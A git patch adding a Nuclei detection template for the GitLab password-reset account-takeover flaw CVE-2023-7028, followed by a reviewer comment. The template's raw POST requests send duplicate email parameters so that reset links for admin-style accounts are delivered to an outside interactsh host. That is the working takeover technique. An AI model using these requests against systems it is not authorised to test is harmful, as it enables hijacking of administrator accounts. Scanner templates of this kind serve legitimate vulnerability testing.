From aab1f47ba13bc825a7a504dd8646382f5bd6b1ed Mon Sep 17 00:00:00 2001
From: Prince Chaddha
Date: Sun, 14 Jan 2024 12:58:32 +0530
Subject: [PATCH] Create CVE-2023-7028.yaml

---
 http/cves/2023/CVE-2023-7028.yaml | 77 +++++++++++++++++++++++++++++++
 1 file changed, 77 insertions(+)
 create mode 100644 http/cves/2023/CVE-2023-7028.yaml

diff --git a/http/cves/2023/CVE-2023-7028.yaml b/http/cves/2023/CVE-2023-7028.yaml
new file mode 100644
index 0000000000..eeda0873ad
--- /dev/null
+++ b/http/cves/2023/CVE-2023-7028.yaml
@@ -0,0 +1,77 @@
+id: CVE-2023-7028
+
+info:
+ name: GitLab Account Takeover via Password Reset without user interactions
+ author: DhiyaneshDk,rootxharsh,iamnooob,pdresearch
+ severity: critical
+ description: |
+ An issue has been discovered in GitLab CE/EE affecting all versions from 16.1 prior to 16.1.6, 16.2 prior to 16.2.9, 16.3 prior to 16.3.7, 16.4 prior to 16.4.5, 16.5 prior to 16.5.6, 16.6 prior to 16.6.4, and 16.7 prior to 16.7.2 in which user account password reset emails could be delivered to an unverified email address.
+ reference:
+ - https://about.gitlab.com/releases/2024/01/11/critical-security-release-gitlab-16-7-2-released/
+ - https://x.com/rwincey/status/1745659710089437368?s=20
+ metadata:
+ verified: true
+ max-request: 2
+ vendor: gitlab
+ product: gitlab
+ shodan-query: title:"Gitlab"
+ tags: cve,cve2023,gitlab,auth-bypass
+
+flow: |
+ http(1);
+ http(2);
+
+http:
+ - raw:
+ - |
+ GET /users/sign_in HTTP/1.1
+ Host: {{Hostname}}
+
+ - |
+ @timeout: 30s
+ POST /users/password HTTP/1.1
+ Host: {{Hostname}}
+ Origin: {{RootURL}}
+ Content-Type: application/x-www-form-urlencoded
+ Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+ Referer: {{RootURL}}/users/password/new
+
+ authenticity_token={{token}}&user[email][]=admin@example.com&user[email][]=nuclei@{{interactsh-url}}
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "contains(interactsh_protocol, 'smtp')"
+
+ extractors:
+ - type: regex
+ part: body
+ name: token
+ group: 1
+ regex:
+ - name="authenticity_token" value="([A-Za-z0-9_-]+)"
+ internal: true
+
+ - raw:
+ - |
+ @timeout: 30s
+ POST /users/password HTTP/1.1
+ Host: {{Hostname}}
+ Origin: {{RootURL}}
+ Content-Type: application/x-www-form-urlencoded
+ Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+ Referer: {{RootURL}}/users/password/new
+
+ authenticity_token={{token}}&user[email][]={{username}}@{{RDN}}&user[email][]=nuclei@{{interactsh-url}}
+
+ payloads:
+ username:
+ - admin
+ - root
+ - gitlab
+ - git
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "contains(interactsh_protocol, 'smtp')"
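Review bot: The template's side effect is not stated anywhere in the `info` block: both `POST /users/password` requests submit two `user[email][]` values, so every run makes the target mail a live reset link for `admin@example.com` and for each of the four `username` payloads at the target's RDN to the interactsh callback host, and nothing in the template undoes that. I'd add a sentence to `description` such as `This check is active: it submits real password-reset requests for candidate accounts, and the resulting reset link is delivered to the interactsh host`, and add the repository's `intrusive` tag if that convention applies to this template. `max-request: 2` also looks understated, since the flow runs the two raw requests of http(1) plus one request per `username` payload in http(2), which I count as six. For defenders the same detail is the detection artifact: a `POST /users/password` carrying more than one `user[email][]` field, one of them at a domain outside the organisation, is worth alerting on.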